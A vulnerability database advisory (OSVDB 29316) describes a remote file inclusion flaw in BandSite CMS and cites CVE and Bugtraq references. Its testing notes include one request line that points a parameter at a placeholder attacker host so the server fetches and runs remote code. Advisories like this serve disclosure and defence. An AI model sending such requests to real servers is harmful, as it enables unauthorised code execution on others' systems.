BandSite CMS mlist_xls.php GLOBALS[root_path] Variable Remote File Inclusion

2006-09-20T15:03:50
ID OSVDB:29316
Type osvdb
Reporter OSVDB
Modified 2006-09-20T15:03:50

Description

Manual Testing Notes

/adminpanel/includes/mailinglist/mlist_xls.php?GLOBALS[root_path]=http://[attacker]/cmd.txt?

References:

Vendor URL: http://sourceforge.net/projects/bandsitecms/ Secunia Advisory ID:21992 Related OSVDB ID: 29319 Related OSVDB ID: 29317 Related OSVDB ID: 29318 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0341.html CVE-2006-4984 Bugtraq ID: 20137